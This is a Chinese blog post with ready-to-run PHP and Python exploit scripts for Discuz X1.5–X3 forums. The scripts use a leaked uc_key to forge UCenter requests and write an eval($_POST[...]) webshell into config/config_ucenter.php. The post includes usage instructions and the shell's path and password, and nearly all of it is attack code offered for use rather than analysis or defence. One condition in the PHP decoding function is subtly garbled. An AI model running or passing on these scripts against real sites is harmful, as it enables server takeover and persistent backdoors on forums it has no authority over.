D0g

我愿乘风破浪,踏遍黄沙海洋

©D0g
Powered by LOFTER
 

Discuz X1.5 X2.5 X3用uc_key来get webshell

uc_key是UC客户端与服务端通信的通信密钥。因此使用uc_key来fetshell只能获取UCenter Client的webshell,即Discuiz!论坛的webshell。如果一个服务器上只有UCenter Server是不能通过uc_key来获取该服务器上的webshell的(不过可以通过uc_key来将服务器上的数据并重置用户口令)。 




漏洞很早就有了(大牛发的7.0-7.2那个 不明原作者是谁 所以版本归原作者所有!)

 

提供两个版本
PHP版本URL和KEY内置,代码如下::






<?php
// 代码版权归原作者所有!
 $timestamp = time()+10*3600;
 $host="127.0.0.1";
 $uc_key="eapf15K8b334Bc8eBeY4Gfn1VbqeA0N5Waofq6J285Ca33i151e551g0l9f2l3dd";
 $code=urlencode(_authcode("time=$timestamp&action=updateapps", 'ENCODE', $uc_key));
 $cmd1='<?xml version="1.0" encoding="ISO-8859-1"?>
<root>
 <item id="UC_API">http://xxx\');eval($_POST[DOM]);//</item>
</root>';
 $cmd2='<?xml version="1.0" encoding="ISO-8859-1"?>
<root>
 <item id="UC_API">http://aaa</item>
</root>';
 $html1 = send($cmd1);
echo $html1;
 $html2 = send($cmd2);
echo $html2;

function send($cmd){
global $host,$code;
 $message = "POST /api/uc.php?code=".$code." HTTP/1.1\r\n";
 $message .= "Accept: */*\r\n";
 $message .= "Referer: ".$host."\r\n";
 $message .= "Accept-Language: zh-cn\r\n";
 $message .= "Content-Type: application/x-www-form-urlencoded\r\n";
 $message .= "User-Agent: Mozilla/4.0 (compatible; MSIE 6.00; Windows NT 5.1; SV1)\r\n";
 $message .= "Host: ".$host."\r\n";
 $message .= "Content-Length: ".strlen($cmd)."\r\n";
 $message .= "Connection: Close\r\n\r\n";
 $message .= $cmd;

 //var_dump($message);
 $fp = fsockopen($host, 80);
fputs($fp, $message);

 $resp = '';

while ($fp && !feof($fp))
 $resp .= fread($fp, 1024);

return $resp;
}

function _authcode($string, $operation = 'DECODE', $key = '', $expiry = 0) {
 $ckey_length = 4;

 $key = md5($key ? $key : UC_KEY);
 $keya = md5(substr($key, 0, 16));
 $keyb = md5(substr($key, 16, 16));
 $keyc = $ckey_length ? ($operation == 'DECODE' ? substr($string, 0, $ckey_length): substr(md5(microtime()), -$ckey_length)) : '';

 $cryptkey = $keya.md5($keya.$keyc);
 $key_length = strlen($cryptkey);

 $string = $operation == 'DECODE' ? base64_decode(substr($string, $ckey_length)) : sprintf('%010d', $expiry ? $expiry + time() : 0).substr(md5($string.$keyb), 0, 16).$string;
 $string_length = strlen($string);

 $result = '';
 $box = range(0, 255);

 $rndkey = array();
for($i = 0; $i <= 255; $i++) {
 $rndkey[$i] = ord($cryptkey[$i % $key_length]);
 }

for($j = $i = 0; $i < 256; $i++) {
 $j = ($j + $box[$i] + $rndkey[$i]) % 256;
 $tmp = $box[$i];
 $box[$i] = $box[$j];
 $box[$j] = $tmp;
 }

for($a = $j = $i = 0; $i < $string_length; $i++) {
 $a = ($a + 1) % 256;
 $j = ($j + $box[$a]) % 256;
 $tmp = $box[$a];
 $box[$a] = $box[$j];
 $box[$j] = $tmp;
 $result .= chr(ord($string[$i]) ^ ($box[($box[$a] + $box[$j]) % 256]));
 }

if($operation == 'DECODE') {
if((substr($result, 0, 10) == 0 substr($result, 0, 10) - time() > 0) && substr($result, 10, 16) == substr(md5(substr($result, 26).$keyb), 0, 16)) {
return substr($result, 26);
 } else {
return '';
 }
 } else {
return $keyc.str_replace('=', '', base64_encode($result));
 }

}
?>




 
python版的,代码如下: 






#! /usr/bin/env python
#coding=utf-8
import hashlib
import time
import math
import base64
import urllib
import urllib2
import sys

def microtime(get_as_float = False) :
    if get_as_float:
        return time.time()
    else:
        return '%.8f %d' % math.modf(time.time())

def get_authcode(string, key = ''):
    ckey_length = 4
    key = hashlib.md5(key).hexdigest()
    keya = hashlib.md5(key[0:16]).hexdigest()
    keyb = hashlib.md5(key[16:32]).hexdigest()
    keyc = (hashlib.md5(microtime()).hexdigest())[-ckey_length:]
    #keyc = (hashlib.md5('0.736000 1389448306').hexdigest())[-ckey_length:]
    cryptkey = keya + hashlib.md5(keya+keyc).hexdigest()

    key_length = len(cryptkey)
    string = '0000000000' + (hashlib.md5(string+keyb)).hexdigest()[0:16]+string
    string_length = len(string)
    result = ''
    box = range(0, 256)
    rndkey = dict()
    for i in range(0,256):
        rndkey[i] = ord(cryptkey[i % key_length])
    j=0
    for i in range(0,256):
        j = (j + box[i] + rndkey[i]) % 256
        tmp = box[i]
        box[i] = box[j]
        box[j] = tmp
    a=0
    j=0
    for i in range(0,string_length):
        a = (a + 1) % 256
        j = (j + box[a]) % 256
        tmp = box[a]
        box[a] = box[j]
        box[j] = tmp
        result += chr(ord(string[i]) ^ (box[(box[a] + box[j]) % 256]))
    return keyc + base64.b64encode(result).replace('=', '')

def get_shell(url,key,host):
    '''
    发送命令获取webshell
    '''
    headers={'Accept-Language':'zh-cn',
    'Content-Type':'application/x-www-form-urlencoded',
    'User-Agent':'Mozilla/4.0 (compatible; MSIE 6.00; Windows NT 5.1; SV1)',
    'Referer':url
    }
    tm = time.time()+10*3600
    tm="time=%d&action=updateapps" %tm
    code = urllib.quote(get_authcode(tm,key))
    url=url+"?code="+code
    data1='''<?xml version="1.0" encoding="ISO-8859-1"?>
            <root>
            <item id="UC_API">http://xxx\');eval($_POST[1]);//</item>
            </root>'''
    try:
        req=urllib2.Request(url,data=data1,headers=headers)
        ret=urllib2.urlopen(req)
    except:
        return "访问出错"
    data2='''<?xml version="1.0" encoding="ISO-8859-1"?>
            <root>
            <item id="UC_API">http://aaa</item>
            </root>'''
    try:
        req=urllib2.Request(url,data=data2,headers=headers)
        ret=urllib2.urlopen(req)
    except:
        return "error"
    return "webshell:"+host+"/config/config_ucenter.php,password:1"

if __name__ == '__main__':
    host=sys.argv[1]
    key=sys.argv[2]
    url=host+"/api/uc.php"
    print get_shell(url,key,host)




 
使用方法: 






python uckey.py http://www.localhost.com/ uckey




 
即第一个参数是网站的根路径,第二个参数是uc_key。获取的webshell是在/config/config_ucenter.php中的